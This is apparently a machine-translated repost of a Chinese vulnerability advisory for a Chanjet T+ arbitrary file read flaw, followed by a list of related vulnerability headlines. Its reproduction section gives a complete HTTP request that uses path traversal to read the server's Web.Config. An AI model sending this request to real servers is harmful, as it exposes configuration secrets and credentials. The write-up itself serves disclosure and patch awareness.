Chanjet TPlus DownloadProxy.aspx has an arbitrary file read vulnerability

News 2023-08-11 21:44:55 views: null

Chanjet TPlus DownloadProxy.aspx has an arbitrary file read vulnerability

1. Introduction to Chanjet TPlus DownloadProxy.aspx
2. Vulnerability description
Three, the impact version
5. Vulnerability recurrence
6. POC&EXP
7. Opinions on rectification

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to Chanjet TPlus DownloadProxy.aspx

Chanjet T+ Dedicated Cloud is suitable for enterprises that need integrated management, such as financial management, business management, retail management, production management, logistics management, mobile warehouse management, marketing management, outsourcing processing and other integrated management of personnel, finance, goods and customers.

2. Vulnerability description

Chanjet T+ Dedicated Cloud is suitable for enterprises that need integrated management, such as financial management, business management, retail management, production management, logistics management, mobile warehouse management, marketing management, outsourcing processing and other integrated management of personnel, finance, goods and customers. The system has an arbitrary file read vulnerability

Three, the impact version

Chanjet T+

insert image description here

5. Vulnerability recurrence

Vulnerability link: http://127.0.0.1/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=…/…/Web.Config

Vulnerability Packet:

GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

insert image description here

6. POC&EXP

Xiaolong POC detection one-pass hala less

Xiaolong POC portal: Xiaolong POC tool
insert image description here

7. Opinions on rectification

At present, the manufacturer has not provided the relevant vulnerability patch link, please pay attention to the manufacturer's homepage for timely updates: https://www.chanjet.com/

Guess you like

Origin blog.csdn.net/holyxp/article/details/131954135

Chanjet TPlus DownloadProxy.aspx has an arbitrary file read vulnerability

Atlassian Confluence Arbitrary File Read Vulnerability

[Medium Risk] Apache Airflow Drill Provider < 2.4.3 has an arbitrary file read vulnerability

CVE-2019-4505: WebSphere arbitrary file read vulnerability alerts

CVE-2021-3019 [Reproduction of Lanproxy arbitrary file read vulnerability]

Grafana Arbitrary File Read Vulnerability (CVE-2021-43798)

CVE-2021-43798 Grafana Unauthorized Arbitrary File Read Vulnerability

Arbitrary File Download Vulnerability

Arbitrary file reading and vulnerability reproduction

Arbitrary file upload vulnerability (introduction)

CVE-2019-11510 Pulse Connect Secure (PCS) SSL VP.N arbitrary file read vulnerability

CISCO ASA device arbitrary file read vulnerability reproduction (CVE-2020-3452)

Spring Cloud Environment: CVE-2022-25401 (arbitrary file read vulnerability)

Apache Druid LoadData Arbitrary File Read Vulnerability CVE-2021-36749

UFIDA U8+CRM Arbitrary File Upload + Read Vulnerability Reappearance (HW0day)

Kingdee Cloud Xingkong arbitrary file read vulnerability recurrence (0day)

OSCS Open Source Security Weekly Issue 56: Apache Airflow Spark Provider Arbitrary File Read Vulnerability

[High Risk] Apache Airflow Spark Provider Arbitrary File Read Vulnerability (CVE-2023-40272)

CVE-2020-8209 (Citrix Endpoint Management) XenMobile-Console has arbitrary file reading vulnerability

Hikvision isecure center comprehensive security management platform has an arbitrary file upload vulnerability

CTI Monitoring and Early Warning System 2.2 has an arbitrary file reading vulnerability

Arbitrary file read and delete vulnerabilities

Penetration testing-arbitrary file download vulnerability

UFIDA NC Arbitrary File Upload Vulnerability Reproduced

Arbitrary file upload vulnerability in UEditor .Net version

[Code Audit] Instance of Arbitrary File Deletion Vulnerability

Hongjing eHR Arbitrary File Upload Vulnerability

Arbitrary File Upload Vulnerability in SecGate 3600 Firewall

There is an arbitrary file reading vulnerability in Lanling OA

There is an arbitrary file reading vulnerability in zeroshell firewall

Recommended

Ranking

Solve the problem that the Chinese display of the drawing using python matplotlib under the Linux system is displayed as a box

[Conference Call for Papers] The 5th International Conference on Civil Engineering, Environmental Resources and Energy Materials (CCESEM 2023)

4-yl Fast Fourier Transform

DataGirdView interlaced display color

[Docker implements test deployment CI/CD----Dingding alarm after the build is successful (7)]

[Asp.net core series] 6 the complete structure of a project in actual combat

The new version of OpenCenterV3 management background

Why can box plots detect outliers and what is the principle?

[Switch] jumbo frame Introduction

C++对象移动（3）——移动构造函数

Daily

More

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)